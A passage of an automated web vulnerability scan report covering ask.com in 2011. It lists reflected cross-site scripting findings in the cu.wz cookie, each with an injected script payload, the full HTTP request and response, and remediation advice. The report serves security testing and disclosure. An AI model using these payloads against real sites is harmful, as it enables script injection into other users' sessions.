User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0bb1f2"-alert(1)-"7a4166739ea; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; qc=0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA2LVVUQw%3D%3D&po=0&pp=dir; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllSQpcQXIAABTifJYAAAEZ
from-tr: trafrt004iad.io.askjeeves.info
Content-Length: 46496
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:25 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjI1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:25 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>About Ask.com: Privacy Policy</title>


<link href="http
...[SNIP]...
{};
WZInfo.pickRedirectDefault = "http://wzus1.ask.com/r?t=p&d=us&s=a&c=h&app=a14&l=dir&o=0&sv=0a5c404b&ip=32177b6a&id=7E2E34D8202F480CD898379E755A71CA&q=&p=0&qs=121&ac=24&g=105dOXJh6osCJW&cu.wz=0bb1f2"-alert(1)-"7a4166739ea";
WZInfo.pickDefault = "http://wzus1.ask.com/i/b.html?t=p&d=us&s=a&c=h&app=a14&l=dir&o=0&sv=0a5c404b&ip=32177b6a&id=7E2E34D8202F480CD898379E755A71CA&q=&p=0&qs=121&ac=24&g=105dOXJh6osCJW&cu.wz=0bb
...[SNIP]...

1.113. http://www.ask.com/news [cu.wz cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /news

Issue detail

The value of the cu.wz cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 392a7"><script>alert(1)</script>c62fd19743e was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /news?o=0&l=dir&qsrc=168&q=xss HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictures?o=0&l=dir&qsrc=167&q=xss&v=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0392a7"><script>alert(1)</script>c62fd19743e; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjQ4LVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllPQpcQKMAAFY@qwcAAAEP
from-tr: trafrt011iad.io.askjeeves.info
Content-Length: 77591
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:13 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjEzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:13 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
<img src="http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=bntps&app=a14&l=dir&o=0&sv=0a5c4050&p=news&rf=0&ord=3589925&cu.wz=0392a7"><script>alert(1)</script>c62fd19743e" height=1 width=1 id="SessionTracker" />
...[SNIP]...

1.114. http://www.ask.com/news [cu.wz cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /news

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd43e"-alert(1)-"a9f401dd648 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news?o=0&l=dir&qsrc=168&q=xss HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictures?o=0&l=dir&qsrc=167&q=xss&v=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0bd43e"-alert(1)-"a9f401dd648; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjQ4LVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllPwpcQDoAAAxvxc8AAAML
from-tr: trafrt010iad.io.askjeeves.info
Cache-Control: private
Content-Length: 77443
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:15 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjE1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:15 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
Image();
st.height = 1;
st.width = 1;
st.id = "SessionTracker";
st.src = "http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=bntps&app=a14&l=dir&o=0&sv=0a5c404d&p=news&rf=0&ord=3754410&cu.wz=0bd43e"-alert(1)-"a9f401dd648";


</script>
...[SNIP]...

1.115. http://www.ask.com/pictures [cu.wz cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the cu.wz cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9561"><script>alert(1)</script>e8deaf81c4c was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /pictures?o=0&l=dir&qsrc=167&q=xss&v=14 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=xss&search=&qsrc=0&o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0b9561"><script>alert(1)</script>e8deaf81c4c; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjM5LVVUQw%3D%3D&po=0&pp=dir; qc=0; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; wz_sid=084EE34C926D4254193520127E77B26A; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.2.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllPwpcQDkAACJXhwoAAAD4
from-tr: trafrt009iad.io.askjeeves.info
Content-Length: 115762
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:15 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjE1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:15 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
<img src="http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=p&app=a14&l=dir&o=0&sv=0a5c4079&p=pictures&rf=0&ord=3785001&cu.wz=0b9561"><script>alert(1)</script>e8deaf81c4c" height=1 width=1 id="SessionTracker" />
...[SNIP]...

1.116. http://www.ask.com/pictures [cu.wz cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23d5a"-alert(1)-"23acc03a791 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pictures?o=0&l=dir&qsrc=167&q=xss&v=14 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=xss&search=&qsrc=0&o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=023d5a"-alert(1)-"23acc03a791; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjM5LVVUQw%3D%3D&po=0&pp=dir; qc=0; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; wz_sid=084EE34C926D4254193520127E77B26A; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.2.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllQQpcQDcAAAZV8RoAAAAm
from-tr: trafrt007iad.io.askjeeves.info
Content-Length: 115582
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:17 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjE3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:17 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
Image();
st.height = 1;
st.width = 1;
st.id = "SessionTracker";
st.src = "http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=p&app=a14&l=dir&o=0&sv=0a5c407a&p=pictures&rf=0&ord=3913624&cu.wz=023d5a"-alert(1)-"23acc03a791";


</script>
...[SNIP]...

1.117. http://www.ask.com/products/display [cu.wz cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /products/display

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ae25"-alert(1)-"eb8fc402c26 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/display HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=07ae25"-alert(1)-"eb8fc402c26; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjUxLVVUQw%3D%3D&po=0&pp=dir; qc=0; wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllPQpcQW8AAHONb-gAAADu
from-tr: trafrt001iad.io.askjeeves.info
Content-Length: 39783
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:13 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjEzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:13 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>Advertise - Ask.com</title>


<link href="http://www.ask
...[SNIP]...

WZInfo.pickRedirectDefault = "http://wzus1.ask.com/r?t=p&d=us&s=a&c=adv&app=aoth&l=dir&o=0&sv=0a5c4050&ip=32177b6a&id=CE5A46FFC89898B9F85CCE078C5D5F15&q=&p=0&qs=121&ac=24&g=2b4aqrWUTiqv21&cu.wz=07ae25"-alert(1)-"eb8fc402c26";
WZInfo.pickDefault = "http://wzus1.ask.com/i/b.html?t=p&d=us&s=a&c=adv&app=aoth&l=dir&o=0&sv=0a5c4050&ip=32177b6a&id=CE5A46FFC89898B9F85CCE078C5D5F15&q=&p=0&qs=121&ac=24&g=2b4aqrWUTiqv21&cu.wz=
...[SNIP]...

1.118. http://www.ask.com/settings [cu.wz cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /settings

Issue detail

The value of the cu.wz cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4aa2"><script>alert(1)</script>6e7e4b15f97 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /settings HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0d4aa2"><script>alert(1)</script>6e7e4b15f97; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0; __qca=P0-1861158471-1313432937925

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllSgpcQW8AAHONd08AAADy
from-tr: trafrt001iad.io.askjeeves.info
Cache-Control: no-cache
Content-Length: 65578
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:26 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjI2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:26 GMT; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
<img src="http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=h&app=aoth&l=dir&o=0&sv=0a5c407d&p=settings&rf=0&ord=4899875&cu.wz=0d4aa2"><script>alert(1)</script>6e7e4b15f97" height=1 width=1 id="SessionTracker" />
...[SNIP]...

1.119. http://www.ask.com/settings [cu.wz cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /settings

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81bfd"-alert(1)-"d4d6009d874 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /settings HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=081bfd"-alert(1)-"d4d6009d874; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0; __qca=P0-1861158471-1313432937925

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllSwpcQDkAACJXjYUAAAD@
from-tr: trafrt009iad.io.askjeeves.info
Content-Length: 65458
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:27 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjI3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:27 GMT; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
mage();
st.height = 1;
st.width = 1;
st.id = "SessionTracker";
st.src = "http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=h&app=aoth&l=dir&o=0&sv=0a5c404f&p=settings&rf=0&ord=4939452&cu.wz=081bfd"-alert(1)-"d4d6009d874";


</script>
...[SNIP]...

1.120. http://www.ask.com/web [cu.wz cookie]

Summary

Severity:   Information
